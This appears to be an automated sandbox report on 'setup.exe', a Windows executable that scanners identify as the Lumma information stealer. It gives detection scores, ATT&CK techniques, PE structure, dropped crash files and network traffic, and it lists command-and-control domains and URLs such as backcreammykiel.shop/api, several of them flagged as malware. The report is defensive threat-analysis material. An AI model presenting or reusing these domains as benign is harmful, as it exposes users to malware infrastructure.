        Security Account Manager12
        Virtualization/Sandbox Evasion
        SMB/Windows Admin Shares4
        Data from Local System
        113
        Application Layer Protocol
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
        Obfuscated Files or Information
        NTDS1
        Process Discovery
        Distributed Component Object Model2
        Clipboard Data
        Protocol ImpersonationTraffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        File and Directory Discovery
        SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials33
        System Information Discovery
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        setup.exe82%ReversingLabsWin32.Spyware.Lummastealer
        setup.exe80%VirustotalBrowse
        setup.exe100%AviraHEUR/AGEN.1317017
        setup.exe100%Joe Sandbox ML
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        backcreammykiel.shop8%VirustotalBrowse
        SourceDetectionScannerLabelLink
        http://upx.sf.net0%URL Reputationsafe
        https://backcreammykiel.shop/D100%Avira URL Cloudmalware
        marathonbeedksow.shop100%Avira URL Cloudmalware
        justifycanddidatewd.shop0%Avira URL Cloudsafe
        https://backcreammykiel.shop:443/apiCLSID100%Avira URL Cloudmalware
        https://backcreammykiel.shop/api100%Avira URL Cloudmalware
        pleasurenarrowsdla.shop0%Avira URL Cloudsafe
        marathonbeedksow.shop15%VirustotalBrowse
        feighminoritsjda.shop100%Avira URL Cloudmalware
        richardflorespoew.shop0%Avira URL Cloudsafe
        https://backcreammykiel.shop/api7100%Avira URL Cloudmalware
        https://backcreammykiel.shop/api17%VirustotalBrowse
        justifycanddidatewd.shop14%VirustotalBrowse
        strwawrunnygjwu.shop0%Avira URL Cloudsafe
        pleasurenarrowsdla.shop14%VirustotalBrowse
        falseaudiencekd.shop0%Avira URL Cloudsafe
        raiseboltskdlwpow.shop0%Avira URL Cloudsafe
        richardflorespoew.shop15%VirustotalBrowse
        https://backcreammykiel.shop/apis100%Avira URL Cloudmalware
        backcreammykiel.shop100%Avira URL Cloudmalware
        https://backcreammykiel.shop/100%Avira URL Cloudmalware
        falseaudiencekd.shop14%VirustotalBrowse
        feighminoritsjda.shop13%VirustotalBrowse
        https://backcreammykiel.shop/apiXEpq100%Avira URL Cloudmalware
        backcreammykiel.shop8%VirustotalBrowse
        strwawrunnygjwu.shop14%VirustotalBrowse
        https://backcreammykiel.shop/0%VirustotalBrowse
        raiseboltskdlwpow.shop14%VirustotalBrowse
        NameIPActiveMaliciousAntivirus DetectionReputation
        backcreammykiel.shop
        104.21.90.18
        truetrueunknown
        NameMaliciousAntivirus DetectionReputation
        https://backcreammykiel.shop/apitrue
        • 17%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        justifycanddidatewd.shoptrue
        • 14%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        marathonbeedksow.shoptrue
        • 15%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        pleasurenarrowsdla.shoptrue
        • 14%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        feighminoritsjda.shoptrue
        • 13%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        richardflorespoew.shoptrue
        • 15%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        strwawrunnygjwu.shoptrue
        • 14%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        falseaudiencekd.shoptrue
        • 14%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        raiseboltskdlwpow.shoptrue
        • 14%, Virustotal, Browse
        • Avira URL Cloud: safe
        unknown
        backcreammykiel.shoptrue
        • 8%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        NameSourceMaliciousAntivirus DetectionReputation
        https://backcreammykiel.shop/DRegAsm.exe, 00000001.00000002.2116693231.0000000003820000.00000004.00000800.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        https://backcreammykiel.shop:443/apiCLSIDRegAsm.exe, 00000001.00000002.2116480868.000000000168C000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        http://upx.sf.netAmcache.hve.5.drfalse
        • URL Reputation: safe
        unknown
        https://backcreammykiel.shop/api7RegAsm.exe, 00000001.00000002.2116197394.0000000001613000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        https://backcreammykiel.shop/apisRegAsm.exe, 00000001.00000002.2116436680.000000000167D000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        https://backcreammykiel.shop/RegAsm.exe, 00000001.00000002.2116693231.0000000003820000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2116139844.00000000015CA000.00000004.00000020.00020000.00000000.sdmptrue
        • 0%, Virustotal, Browse
        • Avira URL Cloud: malware
        unknown
        https://backcreammykiel.shop/apiXEpqRegAsm.exe, 00000001.00000002.2116436680.000000000167D000.00000004.00000020.00020000.00000000.sdmptrue
        • Avira URL Cloud: malware
        unknown
        • No. of IPs < 25%
        • 25% < No. of IPs < 50%
        • 50% < No. of IPs < 75%
        • 75% < No. of IPs
        IPDomainCountryFlagASNASN NameMalicious
        104.21.90.18
        backcreammykiel.shopUnited States
        13335CLOUDFLARENETUStrue
        Joe Sandbox version:40.0.0 Tourmaline
        Analysis ID:1461307
        Start date and time:2024-06-23 18:48:07 +02:00
        Joe Sandbox product:CloudBasic
        Overall analysis duration:0h 4m 46s
        Hypervisor based Inspection enabled:false
        Report type:full
        Cookbook file name:default.jbs
        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
        Number of analysed new started processes analysed:10
        Number of new started drivers analysed:0
        Number of existing processes analysed:0
        Number of existing drivers analysed:0
        Number of injected processes analysed:0
        Technologies:
        • HCA enabled
        • EGA enabled
        • AMSI enabled
        Analysis Mode:default
        Analysis stop reason:Timeout
        Sample name:setup.exe
        Detection:MAL
        Classification:mal100.troj.spyw.evad.winEXE@4/5@1/1
        EGA Information:
        • Successful, ratio: 100%
        HCA Information:
        • Successful, ratio: 95%
        • Number of executed functions: 35
        • Number of non-executed functions: 84
        Cookbook Comments:
        • Found application associated with file extension: .exe
        • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
        • Excluded IPs from analysis (whitelisted): 52.168.117.173
        • Excluded domains from analysis (whitelisted): onedsblobprdeus16.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
        • Report size getting too big, too many NtOpenKeyEx calls found.
        • Report size getting too big, too many NtProtectVirtualMemory calls found.
        • Report size getting too big, too many NtQueryValueKey calls found.
        • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
        TimeTypeDescription
        12:48:55API Interceptor7x Sleep call for process: RegAsm.exe modified
        12:49:11API Interceptor1x Sleep call for process: WerFault.exe modified
        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
        104.21.90.18bFZYRLnRIz.exeGet hashmaliciousLummaC, DCRat, LummaC StealerBrowse
          GlobalCheats.exeGet hashmaliciousLummaC, MicroClipBrowse
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            backcreammykiel.shopbFZYRLnRIz.exeGet hashmaliciousLummaC, DCRat, LummaC StealerBrowse
            • 104.21.90.18
            GlobalCheats.exeGet hashmaliciousLummaC, MicroClipBrowse
            • 104.21.90.18
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            CLOUDFLARENETUS90ZF1EDs9h.exeGet hashmaliciousRisePro StealerBrowse
            • 104.26.5.15
            FieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
            • 104.21.49.90
            setup.exeGet hashmaliciousLummaCBrowse
            • 104.21.89.170
            Extreme injector.exeGet hashmaliciousLummaCBrowse
            • 104.21.49.90
            SecuriteInfo.com.Win64.DropperX-gen.26552.421.exeGet hashmaliciousUnknownBrowse
            • 104.26.3.16
            SecuriteInfo.com.Win64.DropperX-gen.26552.421.exeGet hashmaliciousUnknownBrowse
            • 104.26.3.16
            mCTacyNuyM.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
            • 188.114.97.3
            qEGv2vQa9X.elfGet hashmaliciousMiraiBrowse
            • 1.14.29.35
            zQ35ev2Uw0.elfGet hashmaliciousMiraiBrowse
            • 1.14.29.22
            3jeKnZMljk.elfGet hashmaliciousMiraiBrowse
            • 1.4.15.178
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            a0e9f5d64349fb13191bc781f81f42e190ZF1EDs9h.exeGet hashmaliciousRisePro StealerBrowse
            • 104.21.90.18
            FieroHack.exeGet hashmaliciousLummaC, XmrigBrowse
            • 104.21.90.18
            setup.exeGet hashmaliciousLummaCBrowse
            • 104.21.90.18
            Extreme injector.exeGet hashmaliciousLummaCBrowse
            • 104.21.90.18
            SecuriteInfo.com.Win64.DropperX-gen.26552.421.exeGet hashmaliciousUnknownBrowse
            • 104.21.90.18
            SecuriteInfo.com.Win64.DropperX-gen.26552.421.exeGet hashmaliciousUnknownBrowse
            • 104.21.90.18
            mCTacyNuyM.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, PureLog Stealer, RedLineBrowse
            • 104.21.90.18
            yWny5Jds8b.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
            • 104.21.90.18
            abc.docxGet hashmaliciousUnknownBrowse
            • 104.21.90.18
            bFZYRLnRIz.exeGet hashmaliciousLummaC, DCRat, LummaC StealerBrowse
            • 104.21.90.18
            No context
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):65536
            Entropy (8bit):0.9032313793430391
            Encrypted:false
            SSDEEP:96:nmF67JPs1hqy1yDfRgBQXIDcQvc6QcEVcw3cE/n+HbHg/1AnQECaVDPCoLnNfoUa:maJPjh0BU/gjICBqzuiF5Z24IO8z6
            MD5:23B5BB885BDA0507143F7895134D3731
            SHA1:488FE61BAE9B1A5250C4908354077EDF4AD35210
            SHA-256:B5D19A91DBD77E6349553A68018A17D82EBD5BFDDF7833E114474812CF74B85B
            SHA-512:421877024027D2E79CCC653711C3EDA21EF2E4A5AA40E5BFA3BDCD0BB1C8FF1981B477DFF5F0198A2CBD72AB3D577803DDD796D985C9910AED606777A8C15565
            Malicious:true
            Reputation:low
            Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.6.3.6.3.4.9.3.4.6.7.1.5.5.2.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.6.3.6.3.4.9.3.5.0.6.2.1.7.3.9.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.e.3.4.b.b.9.4.-.6.c.1.a.-.4.e.6.8.-.a.2.c.4.-.1.4.a.e.d.3.2.6.6.0.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.d.3.0.0.c.4.2.-.8.1.a.5.-.4.b.2.b.-.b.9.6.3.-.b.e.b.6.1.f.c.a.2.a.5.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.s.e.t.u.p...e.x.e._.u.n.k.n.o.w.n.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.c.5.8.-.0.0.0.1.-.0.0.1.4.-.2.d.1.a.-.8.c.3.b.8.d.c.5.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.6.6.e.3.a.f.a.d.a.5.8.7.7.4.c.1.3.7.3.d.f.b.1.9.a.0.8.c.0.4.9.0.0.0.0.f.f.f.f.!.0.0.0.0.2.c.7.6.9.1.7.9.5.b.4.3.1.3.7.0.4.b.7.9.c.3.d.f.e.7.0.b.9.5.6.e.8.4.b.4.5.a.1.1.!.s.e.t.u.p...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:Mini DuMP crash report, 14 streams, Sun Jun 23 16:48:54 2024, 0x1205a4 type
            Category:dropped
            Size (bytes):38028
            Entropy (8bit):2.1530547977226298
            Encrypted:false
            SSDEEP:192:pnicXW1Xyt/sPOYs3SaVDsS/I46enGAd/i:hiPYpL3SaRsS/I466i
            MD5:D066339690A2E8BC7A0D0D937C68BB87
            SHA1:7CED279E83AC991BD4BBC0551EFBB258F10CFB76
            SHA-256:D5F152C31078816C30C187CF1D5B100D842A89B804663D5ADD4F962C34836076
            SHA-512:CE9F423551D84D9C39C3828637A38C3713D719CBEA45F173C4D525CF33029E1F87414D8BCFEC30EE982685C86AA56DA0862585AE25551C0EB192AEBF7F0A61D2
            Malicious:false
            Reputation:low
            Preview:MDMP..a..... ........Qxf............d...............l...........2*..........T.......8...........T................x..........l...........X...............................................................................eJ..............GenuineIntel............T.......X....Qxf.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
            Category:dropped
            Size (bytes):8302
            Entropy (8bit):3.6925507388227663
            Encrypted:false
            SSDEEP:192:R6l7wVeJSw6k6YEIYSU9uikgmfPdJDApr089bLosf2A5m:R6lXJ96k6YEnSU9uZgmfPdJDkLbfI
            MD5:05F4B69D713933F6449960C67803B6C8
            SHA1:EBA522DAAA32AD60DC494D8D4C4B345FA991938D
            SHA-256:D3BC6DC8EEC9BE6FB503A1557E6FC8A9262339EEE5C5AB008E7052384275BE92
            SHA-512:AEA6AD4B85E6BC5FCD639D51ACAABC37FA57C19DB9C819B78593E03FACECDA00D9A3B9E9616512AF3E6E0AFAA462A6647F328AB4CC2BC896E143624BF53EA2FB
            Malicious:false
            Reputation:low
            Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.3.1.6.0.<./.P.i.
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):4584
            Entropy (8bit):4.4472178756200496
            Encrypted:false
            SSDEEP:48:cvIwWl8zsPJg77aI98fWpW8VYjYm8M4JSddiFH+q8RuMyeX/VIkd:uIjfxI7OO7VnJSduiTyeX/VIkd
            MD5:1083C895A7B00D3AB37C92ECB07C9EC8
            SHA1:A5B49CB282B87C99C03A6CFBEAA097342B228DE6
            SHA-256:9283360ACA7ED28E032B2D67F6F93DB9975F401574B3F921040EF1CD4DFCB04D
            SHA-512:BD6AFEC5715D7AE26947F29AD320F4CF7C1670D20EFC95628975ED765D79D8A86AF02646A7E9654697E1566234FD632EFFED678A90C897EB37D377DCE83914D2
            Malicious:false
            Reputation:low
            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="380631" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
            Process:C:\Windows\SysWOW64\WerFault.exe
            File Type:MS Windows registry file, NT/2000 or above
            Category:dropped
            Size (bytes):1835008
            Entropy (8bit):4.421334784014075
            Encrypted:false
            SSDEEP:6144:GSvfpi6ceLP/9skLmb0OTgWSPHaJG8nAgeMZMMhA2fX4WABlEnNG0uhiTw:lvloTgW+EZMM6DFy003w
            MD5:1F55EA4B06E8FB477BA58C946BF2C5F5
            SHA1:5760A672F53A0F3255249F1D1640B47F7A49433B
            SHA-256:2439BD4E7340EAD3B3BB4EBF3118698A28EEAB462CA644A134B04A67A255C34B
            SHA-512:B269F4F9B36073F0693A684E12E91CE0359E3F8E92AFB0C2B7651D3425BA3F4F8E145FA9F24C0A8E8F12BD3BDCBF505E34C4CFEFAB1E0E1F3CF71F0535FD2172
            Malicious:false
            Reputation:low
            Preview:regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...;................................................................................................................................................................................................................................................................................................................................................!...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):7.606039017653037
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:setup.exe
            File size:536'576 bytes
            MD5:864fb28b0001b98ddd896dbdc604db30
            SHA1:2c7691795b4313704b79c3dfe70b956e84b45a11
            SHA256:5de143343cc0a2b03f076de338308ac58eda529f6814a2e2266531d8ae09fbb0
            SHA512:a7bec87ea630cbcfb28770bda372ebb7435f753caf6b8255c06d546f11a56c60018ad75f16938d50bb88749b2a2be970c9a9708455b65e5619dc4acae5be1317
            SSDEEP:12288:cckdVi3+T/Tvm4YqTwEa+1mieYTAk+tvC4hV8vTuNnlv:ccoNT/laKmu6K5vTuNl
            TLSH:CAB4E041B4C08032D5A2157305B5D7B55A7EB9714FA19ACFA3D00EBECF302D2EB3696A
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........|]../]../]../....L../......./....K../.S..O../.S..H../....T../]../.../.S...../.P..\../.P..\../Rich]../................PE..L..
            Icon Hash:00928e8e8686b000
            Entrypoint:0x40b7e9
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Time Stamp:0x66716A0D [Tue Jun 18 11:05:49 2024 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:6
            OS Version Minor:0
            File Version Major:6
            File Version Minor:0
            Subsystem Version Major:6
            Subsystem Version Minor:0
            Import Hash:99046e3afc60e2ca10c62342349ab573
            Instruction
            call 00007F5B75051D87h
            jmp 00007F5B7505143Fh
            push ebp
            mov ebp, esp
            mov eax, dword ptr [ebp+08h]
            push esi
            mov ecx, dword ptr [eax+3Ch]
            add ecx, eax
            movzx eax, word ptr [ecx+14h]
            lea edx, dword ptr [ecx+18h]
            add edx, eax
            movzx eax, word ptr [ecx+06h]
            imul esi, eax, 28h
            add esi, edx
            cmp edx, esi
            je 00007F5B750515DBh
            mov ecx, dword ptr [ebp+0Ch]
            cmp ecx, dword ptr [edx+0Ch]
            jc 00007F5B750515CCh
            mov eax, dword ptr [edx+08h]
            add eax, dword ptr [edx+0Ch]
            cmp ecx, eax
            jc 00007F5B750515CEh
            add edx, 28h
            cmp edx, esi
            jne 00007F5B750515ACh
            xor eax, eax
            pop esi
            pop ebp
            ret
            mov eax, edx
            jmp 00007F5B750515BBh
            push esi
            call 00007F5B7505208Dh
            test eax, eax
            je 00007F5B750515E2h
            mov eax, dword ptr fs:[00000018h]
            mov esi, 00482C54h
            mov edx, dword ptr [eax+04h]
            jmp 00007F5B750515C6h
            cmp edx, eax
            je 00007F5B750515D2h
            xor eax, eax
            mov ecx, edx
            lock cmpxchg dword ptr [esi], ecx
            test eax, eax
            jne 00007F5B750515B2h
            xor al, al
            pop esi
            ret
            mov al, 01h
            pop esi
            ret
            push ebp
            mov ebp, esp
            cmp dword ptr [ebp+08h], 00000000h
            jne 00007F5B750515C9h
            mov byte ptr [00482C58h], 00000001h
            call 00007F5B75051883h
            call 00007F5B750546D0h
            test al, al
            jne 00007F5B750515C6h
            xor al, al
            pop ebp
            ret
            call 00007F5B750611B0h
            test al, al
            jne 00007F5B750515CCh
            push 00000000h
            call 00007F5B750546D7h
            pop ecx
            jmp 00007F5B750515ABh
            mov al, 01h
            pop ebp
            ret
            push ebp
            mov ebp, esp
            cmp byte ptr [00482C59h], 00000000h
            je 00007F5B750515C6h
            mov al, 01h
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0x36c1c0x3c.rdata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x840000x1ff0.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x34ba80x1c.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x34ae80x40.rdata
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x2c0000x140.rdata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x2ae800x2b0004cef04bfd6a856d676a20168b55991faFalse0.5568790879360465data6.6415730792011125IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .rdata0x2c0000xb35e0xb40064ea1ad55f0f2be727280d496192c7f3False0.42172309027777777OpenPGP Public Key Version 35.02587358743008IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .data0x380000x4b8680x4a800f2ad39b2f7442e6a0b387d840c7ba732False0.9861282246224832data7.988107939711677IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .reloc0x840000x1ff00x2000c10142443bcc2b196f0abb39f4271c62False0.7646484375data6.557127630374172IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            DLLImport
            ADVAPI32.dllGetNumberOfEventLogRecords
            KERNEL32.dllCreateFileW, HeapSize, WriteConsoleW, CloseHandle, WaitForSingleObject, CreateThread, VirtualAlloc, GetCurrentThreadId, WideCharToMultiByte, MultiByteToWideChar, GetStringTypeW, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, QueryPerformanceCounter, EncodePointer, DecodePointer, LCMapStringEx, GetSystemTimeAsFileTime, GetModuleHandleW, GetProcAddress, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetProcessHeap, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, HeapAlloc, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, SetEndOfFile
            TimestampSource PortDest PortSource IPDest IP
            Jun 23, 2024 18:48:55.472493887 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:55.472523928 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:55.472599983 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:55.473892927 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:55.473907948 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:55.994275093 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:55.994338989 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:55.999203920 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:55.999212980 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.000118971 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.052402973 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.069652081 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.069667101 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.069765091 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.462074995 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.462181091 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.462308884 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.463648081 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.463665962 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.463713884 CEST49705443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.463721037 CEST44349705104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.471035004 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.471054077 CEST44349706104.21.90.18192.168.2.5
            Jun 23, 2024 18:48:56.471127033 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.471430063 CEST49706443192.168.2.5104.21.90.18
            Jun 23, 2024 18:48:56.471446991 CEST44349706104.21.90.18192.168.2.5
